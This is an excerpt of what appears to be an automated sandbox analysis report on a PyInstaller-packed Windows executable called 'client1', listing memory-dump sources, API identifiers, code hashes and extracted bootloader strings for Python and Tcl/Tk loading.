                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                    • Instruction ID: 15fc347ae576280363d2ac980cfb010aeb15619487631d56c09895f8abcbe662
                                                    • Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                    • Instruction Fuzzy Hash: D0118422A1C7C241EE74BF61A4012F9E2AAEF85B80FD54031EA5C57797DFBDD8108721
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: bc68aba4551d34184bb05bda2552568f64e358e9307c55527e30db01171bb599
                                                    • Instruction ID: 44a8cb5cefe810d6dade91abf6b13ea437ccdd4a3b9926db605ca3c2ca9ebe9c
                                                    • Opcode Fuzzy Hash: bc68aba4551d34184bb05bda2552568f64e358e9307c55527e30db01171bb599
                                                    • Instruction Fuzzy Hash: AA218732A18BC187DB71BF28E4403B9B7A6EB84B94F944235E66D476D9DF3DD8008B14
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                    • Instruction ID: 7d7071be6193a31a210b6f2e7c33f2c77c87ea4d077429a36c17e782bd0935d6
                                                    • Opcode Fuzzy Hash: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                    • Instruction Fuzzy Hash: 6D01A521B187C240EA24BB7699010E9E69EFB45FE0F888631DE7C57BD6CE7CD4019711
                                                    APIs
                                                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF79F63A8B6,?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E), ref: 00007FF79F63DD95
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: 2e0f3e4b2c9ccc38d96cb592f5054ed38be707e8bf6a1ab6843b3be497aa41a7
                                                    • Instruction ID: 759ff3523cf500773aa47cd43d58c483f52b5daeafbc5732d7f1b4788e0dabf0
                                                    • Opcode Fuzzy Hash: 2e0f3e4b2c9ccc38d96cb592f5054ed38be707e8bf6a1ab6843b3be497aa41a7
                                                    • Instruction Fuzzy Hash: 7CF04F54B1978A41FEB57A7255403F5A69E5F84B80F985630C92D86282DD9CF5508330
                                                    APIs
                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF79F62FE44,?,?,?,00007FF79F631356,?,?,?,?,?,00007FF79F632949), ref: 00007FF79F63CB0A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: c69b2b415516246c39874758743c65376e97b2ba2b88f646b423658d781f7dfd
                                                    • Instruction ID: aa05f9ea2760911250fe5ba90daae30ba66b8c2fb617f334bac014371a84969b
                                                    • Opcode Fuzzy Hash: c69b2b415516246c39874758743c65376e97b2ba2b88f646b423658d781f7dfd
                                                    • Instruction Fuzzy Hash: 18F05E01B0D3C245FE347AB159402F591EA5F457A0F880630E93E862C2EEACB4408231
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                    • API String ID: 190572456-3109299426
                                                    • Opcode ID: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                    • Instruction ID: 1569068ba6056d29c4952f7f3de6d42d44f31310c0c16f252f5e785b39ce0af7
                                                    • Opcode Fuzzy Hash: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                    • Instruction Fuzzy Hash: 1E42D864A0DB8391FA75FB34EC801F4A2AFAF44794BD45135C86D462A4EF7CB558C322
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                    • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                    • API String ID: 2446303242-1601438679
                                                    • Opcode ID: 47b3578659853d453a5822a751c8e2f63cfdf798862dd1eeebf7592aa26dc86d
                                                    • Instruction ID: b9134069d09b4a981dbd7b4c413f77d9912caae64fa4358441e8a9d992f4923f
                                                    • Opcode Fuzzy Hash: 47b3578659853d453a5822a751c8e2f63cfdf798862dd1eeebf7592aa26dc86d
                                                    • Instruction Fuzzy Hash: 05A17C32208BC196E724AF21E98479EB375F748BA4F904129DB9D43B14DF3DE165CB50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 808467561-2761157908
                                                    • Opcode ID: 46fb5d0366b8e1e712cdd684d815614daf2c7cda5b16cac76ba58e706ef79b66
                                                    • Instruction ID: 5b0ba6a03f5487844e41a113a8b382f86e5846cfd24dccae49d214c9be039ce1
                                                    • Opcode Fuzzy Hash: 46fb5d0366b8e1e712cdd684d815614daf2c7cda5b16cac76ba58e706ef79b66
                                                    • Instruction Fuzzy Hash: 2DB2F572A183C28AE734BE74D4417FDB7AAFB54348F905139DA2D57A88DB38A900DB50
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F6274D7
                                                    • FormatMessageW.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F627506
                                                    • WideCharToMultiByte.KERNEL32 ref: 00007FF79F62755C
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                    • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                    • API String ID: 2920928814-2573406579
                                                    • Opcode ID: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                    • Instruction ID: 3f8bcb08a4949239cf5d499b2be8be6b3ea2e7926f57f98021b190ace911d838
                                                    • Opcode Fuzzy Hash: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                    • Instruction Fuzzy Hash: 85213E71A18B8282E730BF31EC406E6E26BFB88394FC40135D56D926A4EF7CE145C721
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 24fff5600ca101af0e2334446d678d156eb325a0e0e0c0538aba544f51e330ab
                                                    • Instruction ID: d3ee896b1ff875c06ffffb4a6673900127d9fc7f2f0ab2d6f5dccacd6d17444e
                                                    • Opcode Fuzzy Hash: 24fff5600ca101af0e2334446d678d156eb325a0e0e0c0538aba544f51e330ab
                                                    • Instruction Fuzzy Hash: EF312D72609BC196EB70AF70E8803E9B369FB84754F844439DA5D47B95DF38D548C720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: 4204087c2144b4154cc610f07160e172692864cccd6c23e577d201b1c5d7dbdf
                                                    • Instruction ID: d38e4c0a79f0dbfa6df830ab3b98509657511f2034abe3d7e4a29a7db12c421b
                                                    • Opcode Fuzzy Hash: 4204087c2144b4154cc610f07160e172692864cccd6c23e577d201b1c5d7dbdf
                                                    • Instruction Fuzzy Hash: 8E315E32618B8196EB70AF35E8802EEB3A9FB85764F940135EA9D43B95DF3CD145CB10
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 2227656907-0
                                                    • Opcode ID: 1a8060551746b007c23963201f19a9fa9ddec40a19b74045b76b4ab8f762ca91
                                                    • Instruction ID: 572fa503d9efa88cd8877b8e3ca50bbdc41208b686956940698c84aeaa251ad0
                                                    • Opcode Fuzzy Hash: 1a8060551746b007c23963201f19a9fa9ddec40a19b74045b76b4ab8f762ca91
                                                    • Instruction Fuzzy Hash: B2B18222B187E691EA70FB31D4006F9A36AEF45BE4F945131EA6E07B85DE7CE441C720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: memcpy_s
                                                    • String ID:
                                                    • API String ID: 1502251526-0
                                                    APIs
                                                    Similarity
                                                    • API ID: ExceptionRaise_clrfp
                                                    • String ID:
                                                    • API String ID: 15204871-0
                                                    APIs
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $
                                                    • API String ID: 0-227171996
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: e+000$gfff
                                                    • API String ID: 0-3030954782
                                                    Similarity
                                                    • API ID: CurrentFeaturePresentProcessProcessor
                                                    • String ID:
                                                    • API String ID: 1010374628-0
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: gfffffff
                                                    • API String ID: 0-1523873471
                                                    Strings
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: TMP
                                                    • API String ID: 3215553584-3125297090
                                                    APIs
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 093da9d804f6d3f0dcf011766d3ac1044083a14a82be884a6ec622c588f21297
                                                    • Instruction ID: 6b03643ae669f92b7e0fdc29916b452537edaca45991fcb017ba4a9429c9f85b
                                                    • Opcode Fuzzy Hash: 093da9d804f6d3f0dcf011766d3ac1044083a14a82be884a6ec622c588f21297
                                                    • Instruction Fuzzy Hash: E061D522E183D246FB74BA7994502FDE69BBF40370F944239D63E866D6DE6DEC408720
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                    • Instruction ID: df02e9c36dfd779a1eeb64ee4d1834cde1357acb24fff15c354d28ce838adbba
                                                    • Opcode Fuzzy Hash: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                    • Instruction Fuzzy Hash: B4519636E187D182E7349B39C4402B8B7A6EB49B58F644131CE9D07799CFBAE843C750
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0
                                                    • Opcode ID: d52a693ca64156346f3ce50e8e1564a69fccf06189b002bdd4e7495fde204544
                                                    • Instruction ID: 3466ad367906a6bab20ce04bd543433f9c9bfee1f09206e43ea5b445ddaf248a
                                                    • Opcode Fuzzy Hash: d52a693ca64156346f3ce50e8e1564a69fccf06189b002bdd4e7495fde204544
                                                    • Instruction Fuzzy Hash: D9412463B18B8482EF24DF7AD9141E9A3A6AB48FD0B889032DE1D97B54DE7CD0468300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk 